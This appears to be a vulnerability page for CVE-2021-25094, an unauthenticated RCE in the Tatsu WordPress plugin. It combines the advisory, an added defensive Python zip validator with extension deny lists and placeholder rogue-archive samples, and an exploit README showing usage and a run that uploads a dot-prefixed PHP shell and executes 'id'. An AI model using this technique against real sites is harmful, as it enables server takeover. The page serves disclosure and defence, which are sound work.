CVE-2021-25094 PoC — Tatsu < 3.3.12 - Unauthenticated RCE

Associated Vulnerability
Title: Tatsu < 3.3.12 - Unauthenticated RCE (CVE-2021-25094)
Description: The Tatsu WordPress plugin before 3.3.12 exposes the add_custom_font AJAX action without authentication. An attacker can use it to upload a rogue zip archive, which the plugin extracts under the WordPress uploads directory. By placing a PHP shell in the archive with a filename starting with a dot ".", the attacker bypasses the extension check implemented in the plugin. Moreover, there is a race condition in the zip extraction process which leaves the shell file on the filesystem long enough for the attacker to request and execute it.
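The description above names two weaknesses: an extension check that a dot-prefixed name slips past, and extraction into the web root before the check completes. The following is an added example (editor's code, not the plugin's or the PoC author's) of how a font-upload handler can validate a zip defensively: every entry name is checked before anything is written, hidden files, server config files, PHP-family extensions anywhere in the name, and path traversal are all rejected, and extraction happens into a scratch directory rather than the web root. The allowed font extensions, the deny lists and the sample archives are assumptions constructed for the example; the plugin's actual check is not shown on this page.

```python
import io
import os
import posixpath
import tempfile
import zipfile
from typing import Dict, List, Optional

# Assumption: the formats a custom-font endpoint legitimately needs.
ALLOWED_EXT = {"woff", "woff2", "ttf", "otf", "eot", "svg", "css"}
# Extensions the web server may hand to a script engine; rejected wherever
# they appear in the name, because Apache with AddHandler can execute
# "shell.php.woff" as PHP (multi-extension handling).
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps"}
# Per-directory server config that can turn any extension into executable code.
SERVER_CONFIG = {".htaccess", ".user.ini", "web.config"}


def entry_problem(name: str) -> Optional[str]:
    """Return None if the zip entry name is acceptable, else a reason string."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or ".." in norm.split("/"):
        return "path escapes the extraction directory"
    base = posixpath.basename(norm)
    if not base:  # directory entry such as "hjf/"
        return None
    if base.startswith("."):
        # Covers the ".bfzwt.php" trick and ".htaccess": a leading dot is
        # never legitimate for an uploaded font file.
        return "hidden (dot-prefixed) file"
    if base.lower() in SERVER_CONFIG:
        return "server configuration file"
    exts = base.lower().split(".")[1:]
    if not exts:
        return "no extension"
    if any(e in SERVER_EXECUTABLE for e in exts):
        return "server-side executable extension"
    if exts[-1] not in ALLOWED_EXT:
        return f"extension '.{exts[-1]}' not allowed"
    return None


def validate_archive(zip_bytes: bytes) -> Dict[str, str]:
    """Map every rejected entry to its reason; an empty dict means the archive is clean."""
    rejected: Dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reason = entry_problem(info.filename)
            if reason:
                rejected[info.filename] = reason
    return rejected


def is_accepted(zip_bytes: bytes) -> bool:
    return not validate_archive(zip_bytes)


def safe_extract(zip_bytes: bytes, dest_dir: str) -> List[str]:
    """Validate the whole archive first, then extract.

    Nothing is written if any entry fails, so no rogue file exists on disk
    even briefly; this removes the race window the advisory describes.
    """
    rejected = validate_archive(zip_bytes)
    if rejected:
        raise ValueError(f"archive rejected: {rejected}")
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.endswith("/"):
                continue
            target = os.path.join(dest_dir, *info.filename.split("/"))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def extract_to_scratch(zip_bytes: bytes) -> List[str]:
    """Extract into a throwaway directory (never the web root); return relative paths written."""
    with tempfile.TemporaryDirectory() as tmp:
        written = safe_extract(zip_bytes, tmp)
        return sorted(os.path.relpath(p, tmp).replace(os.sep, "/") for p in written)


def build_sample_zip(entries: Dict[str, bytes]) -> bytes:
    """Constructed test archive; the contents are placeholders, not real fonts or shells."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: one archive shaped like the attack, one legitimate font bundle.
ROGUE_ZIP = build_sample_zip({
    "hjf/font.woff": b"wOFF placeholder",
    "hjf/.bfzwt.php": b"<?php /* placeholder */ ?>",
    "hjf/.htaccess": b"AddType application/x-httpd-php .woff\n",
    "hjf/font.php.woff": b"<?php /* placeholder */ ?>",
    "../outside.txt": b"zip slip",
})
CLEAN_ZIP = build_sample_zip({
    "myfont/myfont.woff2": b"wOF2 placeholder",
    "myfont/style.css": b"@font-face{}",
})

if __name__ == "__main__":
    for entry, reason in validate_archive(ROGUE_ZIP).items():
        print(f"REJECT {entry}: {reason}")
    print("clean archive extracted:", extract_to_scratch(CLEAN_ZIP))
```

The ordering matters: the dot-prefix and traversal checks run on the raw entry name before any extension logic, so a name like `.bfzwt.php` is refused for what it is rather than for what its last suffix happens to be, and the archive is never touched on disk until every entry has passed.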
Readme
# Preauth RCE in Tatsu Builder WordPress plugin (CVE-2021-25094)

Simple PoC of an unauthenticated RCE in Tatsu Builder <= 3.3.11 provided as an example.

Full write-up here: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/

Usage:
```
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd

positional arguments:
  url                   Wordpress vulnerable URL (example: https://mywordpress.com/)
  cmd                   OS command to execute

optional arguments:
  -h, --help            show this help message and exit
  --technique TECHNIQUE
                        Shell technique: php | htaccess | custom
  --customShell CUSTOMSHELL
                        Provide a custom PHP shell file that will take a base64 cmd as $_POST['text'] input
  --keep KEEP           Do not auto-destruct the uploaded PHP shell
  --proxy PROXY         Specify and use an HTTP proxy (example: http://localhost:8080)
  --compressionLevel COMPRESSIONLEVEL
                        Compression level of the zip file (0 to 9, default 9)
```

Example:
```
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)

[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit success!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job done
```